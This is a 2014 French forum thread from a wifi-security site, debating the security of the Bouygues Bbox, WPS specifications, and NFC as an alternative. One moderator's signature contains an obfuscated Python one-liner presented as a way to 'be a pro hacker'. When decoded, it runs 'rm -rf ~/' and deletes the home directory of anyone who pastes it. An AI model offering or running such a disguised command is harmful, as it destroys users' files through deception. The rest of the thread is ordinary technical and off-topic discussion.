#46 27-02-2014 10:13:49

spawn
Modérateur
Inscription : 14-01-2011
Messages : 1 006

Re : Bbox: La Box la moins sûre au monde. Seule solution : Changez d'ISP!

Messieurs, je me permet de vous redemander un peu de tenue, nous avons un invité qui  - pour une fois -  n'est pas un individu lambda qui surfe sur la révolution informatique pour se mettre hors la loi.

Kcdtv: http://standards.ieee.org/about/get/802/802.11.html


@9b0ae3c4 méric.fr
be a pro hacker : python -c "exec ''.join([chr(ord(i)^0x46) for i in '/+6)42f)5}f)5h5?52#+nd4+fk4 f8ido'])"

Hors Ligne

#47 27-02-2014 13:38:48

kcdtv
Membre d'honneur
Lieu : Internacionaluña
Inscription : 31-03-2010
Messages : 4 246

Re : Bbox: La Box la moins sûre au monde. Seule solution : Changez d'ISP!

Fuji a écrit :

Moi je suis sans papiers et je vends des culottes au marché nux

big_smile
Au moins sache que Francis Bouygues "t'aimes beaucoup" et que tu as "beaucoup de qualités"

Francis Bouygues, 1970 a écrit :

« Cette main d’œuvre étrangère est une main d’œuvre que j aime beaucoup. Parce qu’il y a vingt ans que je travaille avec une majorité d’étrangers, donc je les connais bien. Les étrangers sont des gens qui ont beaucoup de qualités, et ils ont une qualité fondamentale pour moi employeur, c’est qu’ils viennent chez nous pour travailler. [...] Alors, ça c’est à leur actif. Mais par contre, ils ne parlent pas notre langue, ils ne sont pas tellement qualifiés. Et puis ils viennent avec une idée en tête, c’est d’amasser un pécule et de nous quitter quand ils auront amassé un pécule suffisant. »

@ Koala
Peut être  as-tu écouté ce reportage de radio de la journaliste Pascale Pascariello qui fut diffusé dans "là-bas si j'y suis" ?
C'est "Édifiant" sur le BTP  tongue
Leurs bras nous sont soumis I
Leurs bras nous sont soumis II - Suite du reportage de Pascale Pascariello


@ Spawn
Je ne vois pas dans un de ces 4 manuels que tu mets qu'il y a "en page 94 une spécification v2.0.2 sur le WPS PBC ". 
Quant aux autres ils sont "offtopic", tout du moins il me semble... hmm
Tu pourrais me dire où tu as vu exactement cet aparté et dans quel manuel ? smile

@ Aphid

Bonjour
Si tu pouvais mettre le PDF en lien ce serait sympa. smile
( Tu peux utiliser la fonction téléchargements du forum pour uploader et insérer le lien )
Merci smile

Hors Ligne

#48 01-03-2014 19:16:02

Aphid
Membre
Inscription : 23-02-2014
Messages : 15

Re : Bbox: La Box la moins sûre au monde. Seule solution : Changez d'ISP!

Hello,

La spécification que je cite est issue de la wifi alliance et non de l'IEEE.

Je ne peux pas te fournir le document (clause), mais j'ai vu qu'il était disponible quelque part sur le forum en version 1.0.


La norme > l'interprétation de la norme > l'implémentation de l'interprétation

Hors Ligne

#49 01-03-2014 22:21:47

koala
Membre d'honneur
Lieu : In the sky
Inscription : 03-09-2010
Messages : 2 314

Re : Bbox: La Box la moins sûre au monde. Seule solution : Changez d'ISP!

@Aphid,


Que pensez-vous de l'implémentation de la méthode NFC?


Pour moi une box ne répondant que dans un rayon d'action limité serait le meilleur choix a faire, puis bon je vois pas en quoi ça dérangerait Mr.Bean de se déplacer a moins d'un mètre de sa box pour pouvoir se connecter... wink

Hors Ligne

#50 02-03-2014 11:15:49

airbase
Membre
Inscription : 03-02-2014
Messages : 23

Re : Bbox: La Box la moins sûre au monde. Seule solution : Changez d'ISP!

Koala, déplacer un smartphone : Ok, une tablette Ok, un Pc portable à la limite, mais si on parle de tour, télévision ou console de jeu ce n'est plus la même affaire.

De plus que très peu d'appareils ont le NFC alors que beaucoup de clés Wifi ont le WPS.

Non il faut garder le WPS.

Hors Ligne

Annonce

Visitez la boutique Wifi-highpower.com, votre revendeur agr Alfa Network: du matriel Wifi slectionn, cartes Wifi USB Awus036h et Awus036nh, antennes omnis, yagis, panel, amplis wifi, accessoires...

Sujets similaires

Discussion Réponses Vues Dernier message
7 291 23-11-2016 18:46:08 par koala
35 1727 23-11-2016 16:31:33 par roofnat
0 335 20-11-2016 09:18:26 par regard48
WPS Bbox désactivé? par Carbon
1 388 16-09-2016 14:15:47 par kcdtv
0 533 03-05-2016 06:36:12 par ✞θ!ก∃℧┌

Pied de page des forums


Le coin des bonnes affaires, achats informatiques:


|   Alfa 1000 mW AWUS036H   |    Linksys WRT54GL   |    Misco, informatique   |   
 |    Ebay   |    PC portables   |    PC Gamers & Tuning   |    Cles USB   |   
|   Disques durs externes 2 To   |   
|   Wifi-highpower.com   |   


Server Stats - [ Generated in 0.041 seconds ]   Forum Stat - [ Most users ever online on the forum was : 150 on 20-09-2009 17:06:59 ]